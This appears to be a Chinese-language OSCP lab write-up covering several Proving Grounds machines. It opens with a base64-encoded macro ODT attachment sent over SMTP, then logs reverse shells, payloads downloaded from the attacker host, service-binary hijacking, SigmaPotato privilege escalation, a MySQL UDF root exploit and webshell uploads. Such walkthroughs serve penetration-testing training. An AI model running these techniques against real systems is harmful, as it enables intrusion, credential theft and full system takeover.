-> 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
-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
-> WgAAAAAAAAAAAAAAABwAAABDb25maWd1cmF0aW9uczIvYWNjZWxlcmF0b3IvUEsDBBQAAAAAAGUp
-> zFoAAAAAAAAAAAAAAAAYAAAAQ29uZmlndXJhdGlvbnMyL2Zsb2F0ZXIvUEsDBBQAAAAAAGUpzFoA
-> AAAAAAAAAAAAAAAXAAAAQ29uZmlndXJhdGlvbnMyL2ltYWdlcy9QSwMEFAAAAAAAZSnMWgAAAAAA
-> AAAAAAAAABgAAABDb25maWd1cmF0aW9uczIvbWVudWJhci9QSwMEFAAAAAAAZSnMWgAAAAAAAAAA
-> AAAAABoAAABDb25maWd1cmF0aW9uczIvcG9wdXBtZW51L1BLAwQUAAAAAABlKcxaAAAAAAAAAAAA
-> AAAAHAAAAENvbmZpZ3VyYXRpb25zMi9wcm9ncmVzc2Jhci9QSwMEFAAAAAAAZSnMWgAAAAAAAAAA
-> AAAAABoAAABDb25maWd1cmF0aW9uczIvc3RhdHVzYmFyL1BLAwQUAAAAAABlKcxaAAAAAAAAAAAA
-> AAAAGAAAAENvbmZpZ3VyYXRpb25zMi90b29sYmFyL1BLAwQUAAAAAABlKcxaAAAAAAAAAAAAAAAA
-> GgAAAENvbmZpZ3VyYXRpb25zMi90b29scGFuZWwvUEsDBBQAAAAAAGUpzFoAAAAAAAAAAAAAAAAf
-> AAAAQ29uZmlndXJhdGlvbnMyL2ltYWdlcy9CaXRtYXBzL1BLAwQUAAAACABlKcxapoQwVWAAAACT
-> AAAAGAAAAFRodW1ibmFpbHMvdGh1bWJuYWlsLnBuZ+sM8HPn5ZLiYmBg4PX0cAkC0nuB+D8HM5Cc
-> PFM9FUhxBviEuP7//x8k/v9/3ft+fyDL1dPFMaTi1tuDjLxA3qEF3/1z+dlFGEgCH5L3OjEwnncM
-> LQDxPF39XNY5JTQBAFBLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAGAAAAAAAAAAAAEAD9QQAA
-> AABCYXNpYy9QSwECFAMUAAAAAABlKcxaAAAAAAAAAAAAAAAAEAAAAAAAAAAAABAA/UEkAAAAQ29u
-> ZmlndXJhdGlvbnMyL1BLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAJAAAAAAAAAAAAEAD9QVIA
-> AABNRVRBLUlORi9QSwECFAMUAAAAAABlKcxaAAAAAAAAAAAAAAAACwAAAAAAAAAAABAA/UF5AAAA
-> VGh1bWJuYWlscy9QSwECFAMUAAAACABlKcxak9eg2jsHAADIMwAACgAAAAAAAAAAAAAAtIGiAAAA
-> c3R5bGVzLnhtbFBLAQIUAxQAAAAIAGUpzFq0oNiO2AYAAFs/AAAMAAAAAAAAAAAAAAC0gQUIAABz
-> ZXR0aW5ncy54bWxQSwECFAMUAAAACABlKcxaH5hVdl4EAABoDwAACwAAAAAAAAAAAAAAtIEHDwAA
-> Y29udGVudC54bWxQSwECFAMUAAAACABlKcxa1fiycQYBAACTAwAADAAAAAAAAAAAAAAAtIGOEwAA
-> bWFuaWZlc3QucmRmUEsBAhQDFAAAAAgAZSnMWoVsOYosAAAALgAAAAgAAAAAAAAAAAAAALSBvhQA
-> AG1pbWV0eXBlUEsBAhQDFAAAAAgAZSnMWsQp0KCnAQAAaAMAAAgAAAAAAAAAAAAAALSBEBUAAG1l
-> dGEueG1sUEsBAhQDFAAAAAgAZSnMWr3ammxVAQAAaQUAABUAAAAAAAAAAAAAALSB3RYAAE1FVEEt
-> SU5GL21hbmlmZXN0LnhtbFBLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAPAAAAAAAAAAAAEAD9
-> QWUYAABCYXNpYy9TdGFuZGFyZC9QSwECFAMUAAAACABlKcxaTmWDcdQAAABWAQAAEwAAAAAAAAAA
-> AAAAtIGSGAAAQmFzaWMvc2NyaXB0LWxjLnhtbFBLAQIUAxQAAAAIAGUpzFq6Tp8w2QAAAGABAAAc
-> AAAAAAAAAAAAAAC0gZcZAABCYXNpYy9TdGFuZGFyZC9zY3JpcHQtbGIueG1sUEsBAhQDFAAAAAgA
-> ZSnMWsu5SyCSAwAAHgcAABoAAAAAAAAAAAAAALSBqhoAAEJhc2ljL1N0YW5kYXJkL01vZHVsZTEu
-> eG1sUEsBAhQDFAAAAAAAZSnMWgAAAAAAAAAAAAAAABwAAAAAAAAAAAAQAP1BdB4AAENvbmZpZ3Vy
-> YXRpb25zMi9hY2NlbGVyYXRvci9QSwECFAMUAAAAAABlKcxaAAAAAAAAAAAAAAAAGAAAAAAAAAAA
-> ABAA/UGuHgAAQ29uZmlndXJhdGlvbnMyL2Zsb2F0ZXIvUEsBAhQDFAAAAAAAZSnMWgAAAAAAAAAA
-> AAAAABcAAAAAAAAAAAAQAP1B5B4AAENvbmZpZ3VyYXRpb25zMi9pbWFnZXMvUEsBAhQDFAAAAAAA
-> ZSnMWgAAAAAAAAAAAAAAABgAAAAAAAAAAAAQAP1BGR8AAENvbmZpZ3VyYXRpb25zMi9tZW51YmFy
-> L1BLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAaAAAAAAAAAAAAEAD9QU8fAABDb25maWd1cmF0
-> aW9uczIvcG9wdXBtZW51L1BLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAcAAAAAAAAAAAAEAD9
-> QYcfAABDb25maWd1cmF0aW9uczIvcHJvZ3Jlc3NiYXIvUEsBAhQDFAAAAAAAZSnMWgAAAAAAAAAA
-> AAAAABoAAAAAAAAAAAAQAP1BwR8AAENvbmZpZ3VyYXRpb25zMi9zdGF0dXNiYXIvUEsBAhQDFAAA
-> AAAAZSnMWgAAAAAAAAAAAAAAABgAAAAAAAAAAAAQAP1B+R8AAENvbmZpZ3VyYXRpb25zMi90b29s
-> YmFyL1BLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAaAAAAAAAAAAAAEAD9QS8gAABDb25maWd1
-> cmF0aW9uczIvdG9vbHBhbmVsL1BLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAfAAAAAAAAAAAA
-> EAD9QWcgAABDb25maWd1cmF0aW9uczIvaW1hZ2VzL0JpdG1hcHMvUEsBAhQDFAAAAAgAZSnMWqaE
-> MFVgAAAAkwAAABgAAAAAAAAAAAAAALSBpCAAAFRodW1ibmFpbHMvdGh1bWJuYWlsLnBuZ1BLBQYA
-> AAAAGgAaAJwGAAA6IQAAAAA=
->
-> ------=_MIME_BOUNDARY_000_910526--
->
->
-> .
<- 250 Data received OK.
-> QUIT
<- 221 localhost Service closing channel.
=== Connection closed with remote host.Proof
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.140] 50825
whoami
hepet\ela arwel
PS C:\Program Files\LibreOffice\program> cd ~
PS C:\Users\Ela Arwel> type desktop\local.txt
e8c6f0142988b765cb26eec62b29b742
PS C:\Users\Ela Arwel> Privilege Escalation – service binary hijack
用 powerup 查看,在擁有權限的資料夾下有個是用 system 在跑的 service
PS C:\Users\Ela Arwel> . .\PowerUp.ps1
PS C:\Users\Ela Arwel> Invoke-AllChecks
ServiceName : VeyonService
Path : C:\Users\Ela Arwel\Veyon\veyon-service.exe
ModifiablePath : @{ModifiablePath=C:\Users\Ela Arwel\Veyon\veyon-service.exe; IdentityReference=HEPET\Ela Arwel;
Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'VeyonService' -Path <HijackPath>
CanRestart : False
Name : VeyonService
Check : Unquoted Service PathsPS C:\Users\Ela Arwel\Veyon> mv veyon-service.exe veyon-service.exe.bak
PS C:\Users\Ela Arwel\Veyon> cp //192.168.45.228/share/exp.exe .
PS C:\Users\Ela Arwel\Veyon> mv exp.exe veyon-service.exe
PS C:\Users\Ela Arwel\Veyon> shutdown -r -t 0Proof
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.140] 49668
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>Billyboss
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.61 | TCP:21,80,135,139,445,5040,8081 |
Web enumeration
在 8081 port 跑著 Sonatype Nexus Repository Manager,有 auth RCE
Initial Access
使用 exploit 修改 URL,CMD,USERNAME,PASSWORD 。這裡帳密使用 nexus/nexus
Proof
┌──(kali㉿kali)-[~/oscp/pg/Billyboss]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.61] 49853
whoami
billyboss\nathan
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> cd ~
PS C:\Users\nathan> type desktop\local.txt
10b6ad854ab7587cdc005dd7f0eacd53
PS C:\Users\nathan> Privilege Escalation – SeImpersonatePrivilege
使用 SigmaPotato.exe 更改 administrator 的密碼,之後再用 psexec 登入
PS C:\Users\nathan> .\SigmaPotato.exe "net user administrator pwn"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 832 | Token: 0x768 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 952
[+] Current Command Length: 26 characters
[+] Creating Process via 'CreateProcessWithTokenW'
[+] Process Started with PID: 4884
[+] Process Output:
The command completed successfully.
PS C:\Users\nathan> Proof
┌──(kali㉿kali)-[~/oscp/pg/Billyboss]
└─$ impacket-psexec 'Administrator':'pwn'@'192.168.162.61'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 192.168.162.61.....
[*] Found writable share ADMIN$
[*] Uploading file KobNoVMV.exe
[*] Opening SVCManager on 192.168.162.61.....
[*] Creating service mzDR on 192.168.162.61.....
[*] Starting service mzDR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type c:\users\administrator\desktop\proof.txt
473ba6697c2261e11c5ab2359726456b
C:\Windows\system32> Craft
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.228.169 | TCP:80 |
Web Enumeration
網站功能是要 user 上傳自己的 resume ,並且只接受 odt file
Initial Access – ODT macro with revshell
使用 Macro Generator 產生一個 odf file 並上傳
Proof
┌──(kali㉿kali)-[~/oscp/pg/Craft]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.228.169] 49828
whoami
craft\thecybergeek
PS C:\Program Files\LibreOffice\program> cd ~
PS C:\Users\thecybergeek> type desktop\local.txt
f445b235557331d186400f6ff386d15f
PS C:\Users\thecybergeek> Privilege Escalation – SeImpersonatePrivilege
可以寫入 C:\xampp\htdocs ,利用 service account 有 SeImpersonatePrivilege ,寫入一個 webshell 之後拿到 service account 的 revshell
PS C:\xampp\htdocs> icacls C:\xampp\htdocs
C:\xampp\htdocs CRAFT\apache:(OI)(CI)(F)
CRAFT\apache:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
PS C:\xampp\htdocs> whoami
craft\thecybergeek
PS C:\xampp\htdocs> curl.exe 192.168.45.233:8000/shell.php -o shell.php
PS C:\xampp\htdocs> 使用 SigmaPotato.exe
┌──(kali㉿kali)-[~/oscp/pg/Craft]
└─$ rlwrap nc -lvnp 8787
listening on [any] 8787 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.228.169] 49929
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeTcbPrivilege Act as part of the operating system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\xampp\htdocs> curl.exe 192.168.45.233:8000/SigmaPotato.exe -o SigmaPotato.exe先把 Administrator 的密碼改為 pwn
PS C:\xampp\htdocs> .\SigmaPotato.exe "net user Administrator pwn"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 880 | Token: 0x804 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 992
[+] Current Command Length: 26 characters
[+] Creating Process via 'CreateProcessWithTokenW'
[+] Process Started with PID: 4708
[+] Process Output:
The command completed successfully.從攻擊機下載 enable RDP script 再去執行
PS C:\xampp\htdocs> type enablerdp.cmd
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
PS C:\xampp\htdocs> .\SigmaPotato.exe "cmd.exe /c C:\xampp\htdocs\enablerdp.cmd"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 880 | Token: 0x804 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 948
[+] Current Command Length: 40 characters
[+] Creating Process via 'CreateProcessWithTokenW'
[+] Process Started with PID: 4288
[+] Process Output:
C:\Windows\system32>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
C:\Windows\system32>netsh advfirewall firewall set rule group="remote desktop" new enable=yes
The following helper DLL cannot be loaded: RASMONTR.DLL.
The following helper DLL cannot be loaded: DOT3CFG.DLL.
The following helper DLL cannot be loaded: HNETMON.DLL.
The following helper DLL cannot be loaded: NETTRACE.DLL.
The following helper DLL cannot be loaded: NSHIPSEC.DLL.
The following helper DLL cannot be loaded: PEERDISTSH.DLL.
Updated 3 rule(s).
Ok.
PS C:\xampp\htdocs>Proof
Pebbles
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.52 | TCP:21,22,80,3305,8080 |
Web Enumeration
網站在 8080 port ,其中 /zm 可以看到網站運行 ZoneMinder Console v1.29,具有 SQLI
Initial Access – SQLI to RCE
根據 exploit 的 sql injection parameter,注入 webshell
訪問 3305 port 的網站 /shell.php 來執行 webshell 去執行 revshell。
拿到的身分是 www-data 還拿不到 local.txt ,觀察運行的服務發現 mysql 是用 root 權限在跑
www-data@pebbles:/tmp$ ss -tuln
ss -tuln
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 :::8080 :::*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 32 :::21 :::*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 128 :::3305 :::*
www-data@pebbles:/tmp$ ps aux | grep mysql
ps aux | grep mysql
root 1152 0.0 20.8 1153680 211832 ? Ssl 22:02 0:00 /usr/sbin/mysqld
www-data 24104 0.0 0.0 11284 944 pts/0 S+ 22:23 0:00 grep mysql
www-data@pebbles:/tmp$ 利用sqli 更改 mysql root 的密碼參考 hacktricks
這樣就可以使用 mysql 了
www-data@pebbles:/tmp$ mysql -uroot -h localhost -pMyNewPass
mysql -uroot -h localhost -pMyNewPass
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 32
Server version: 5.7.30-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> 因為知道 mysql 是用 root 權限在執行,作法參考 hacktricks ,搭配這個 UDF exploit 來提權
mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)
mysql> insert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so'));
insert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so'));
Query OK, 1 row affected (0.00 sec)
mysql> sselect * from foo into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so';
Query OK, 1 row affected (0.00 sec)
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
Query OK, 0 rows affected (0.00 sec)
mysql> 已經有可以執行 root 權限的環境了,直接把 /bin/bash 設定 SUID
Proof
mysql> select sys_exec('chmod +s /bin/bash');
select sys_exec('chmod +s /bin/bash');
+--------------------------------+
| sys_exec('chmod +s /bin/bash') |
+--------------------------------+
| 0 |
+--------------------------------+
1 row in set (0.00 sec)
mysql> exit
exit
Bye
www-data@pebbles:/tmp$ ls -lh /bin/bash
ls -lh /bin/bash
-rwsr-sr-x 1 root root 1014K Jul 12 2019 /bin/bash
www-data@pebbles:/tmp$ /bin/bash -p
/bin/bash -p
bash-4.3# cat /root/proof.txt
cat /root/proof.txt
2e5766ea30d43cb95ed66ea95459b517
bash-4.3# Clue
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.240 | TCP:22,80,139,445,3000,8021 |
FTP enumeration
在 8021 跑 FreeSWITCH ,這東西有 RCE 漏洞但是需要密碼
Web enumeration
運行 cassandra web ,有 Remote File Read
Initial Access
找到 FreeSWITCH 存放密碼的檔案 /etc/freeswitch/autoload_configs/event_socket.conf.xml,並讀取密碼
┌──(kali㉿kali)-[~/oscp/pg/Clue]
└─$ python3 49362 192.168.162.240 -p 3000 /etc/freeswitch/autoload_configs/event_socket.conf.xml
<configuration name="event_socket.conf" description="Socket Client">
<settings>
<param name="nat-map" value="false"/>
<param name="listen-ip" value="0.0.0.0"/>
<param name="listen-port" value="8021"/>
<param name="password" value="StrongClueConEight021"/>
</settings>
</configuration>使用 exploit ,修改為 self.PASSWORD = ‘StrongClueConEight021’
Proof
┌──(kali㉿kali)-[~/oscp/pg/Clue]
└─$ rlwrap nc -lvnp 3000
listening on [any] 3000 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.240] 45240
whoami
freeswitch
python3 -c 'import pty;pty.spawn("/bin/bash")'
freeswitch@clue:/$ cd ~
cd ~
freeswitch@clue:/var/lib/freeswitch$ ls
ls
db images local.txt recordings storage
freeswitch@clue:/var/lib/freeswitch$ cat local.txt
cat local.txt
cd87c4223a295c13753bc33528d6594e
freeswitch@clue:/var/lib/freeswitch$ privilege escalation
用 lineas 看到 cassie 的密碼 SecondBiteTheApple330
cassie 930 0.0 1.6 623244 34460 ? Ssl 01:44 0:00 /usr/bin/ruby2.5 /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330切換到 cassie 後發現家目錄有一個 id_rsa ,嘗試後發現是 root 的 id_rsa
cassie@clue:~$ ssh root@localhost -i id_rsa
ssh root@localhost -i id_rsa
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Apr 29 17:57:54 2024
root@clue:~# cat /root/proof.txt
cat /root/proof.txt
The proof is in another file
root@clue:~# ls /root
ls /root
proof.txt proof_youtriedharder.txt smbd.sh
root@clue:~# cat /root/proof_youtriedharder.txt
cat /root/proof_youtriedharder.txt
f62d718fb1d06a5a658a09eb5af12404
root@clue:~# Shenzi
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.55 | TCP:21,80,135,139,443,445,3306,7680 |
SMB enumeration
SMB 匿名登入,發現含有 wordpress 帳密的文件,和最重要的路徑名稱 /shenzi
┌──(kali㉿kali)-[~/oscp/pg/Shenzi]
└─$ smbclient //192.168.162.55/Shenzi -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 28 11:45:09 2020
.. D 0 Thu May 28 11:45:09 2020
passwords.txt A 894 Thu May 28 11:45:09 2020
readme_en.txt A 7367 Thu May 28 11:45:09 2020
sess_klk75u2q4rpgfjs3785h6hpipp A 3879 Thu May 28 11:45:09 2020
why.tmp A 213 Thu May 28 11:45:09 2020
xampp-control.ini A 178 Thu May 28 11:45:09 2020
12941823 blocks of size 4096. 6495214 blocks available
smb: \> Initial Access
在網站 /shenzi/wp-login.php 使用得到的帳密 admin/FeltHeadwallWight357 登入,上傳並安裝一個 wordpress-webshell-plugin
┌──(kali㉿kali)-[~/oscp/pg/Shenzi]
└─$ curl -X POST 'http://192.168.162.55/shenzi/wp-content/plugins/wp_webshell/wp_webshell.php' --data "action=exec&cmd=whoami"
{"stdout":"shenzi\\shenzi\r\n","stderr":"","exec":"whoami"} ┌──(kali㉿kali)-[~/oscp/pg/Shenzi]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.55] 50413
whoami
shenzi\shenzi
PS C:\> cd ~
PS C:\Users\shenzi> type desktop\local.txt
f02c9a772e5593da5d8ef7a458b96f96
PS C:\Users\shenzi> privilege escalation – abuse Write-UserAddMSI
用 powerup 查看,有 Write-UserAddMSI 可以利用
Check : AlwaysInstallElevated Registry Key
AbuseFunction : Write-UserAddMSI
DefaultDomainName : SHENZI
DefaultUserName : shenzi
DefaultPassword :
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
Check : Registry Autologons作法參考 這篇
